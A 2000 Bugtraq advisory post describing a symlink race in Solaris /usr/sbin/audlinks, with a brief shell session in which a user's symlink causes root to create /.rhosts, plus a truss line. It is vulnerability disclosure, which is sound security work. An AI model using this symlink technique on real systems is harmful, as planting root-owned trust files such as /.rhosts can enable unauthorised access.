[18372] in bugtraq

No subject found in mail header

daemon@ATHENA.MIT.EDU ("Optyx - Uberhax0r Communications")
Fri Dec 29 13:22:56 2000

Message-ID:  <20001228223450.467DD24CE95@lists.securityfocus.com>
Date:         Thu, 28 Dec 2000 14:34:50 -0800
Reply-To: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
From: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

/usr/sbin/audlinks has the following behavior:
$ id
uid=100(optyx) gid=1(other)
$ mkdir -p /tmp/b/dev
$ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
$ su root
Password:
# /usr/sbin/audlinks -r /tmp/b
# ls -l /.rhosts
-rw-r--r--   1 root     other          4 Dec 28 14:28 /.rhosts

truss output snippet:
open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4

This is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability, as a user has to set the link and then root has to run the program, but)

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net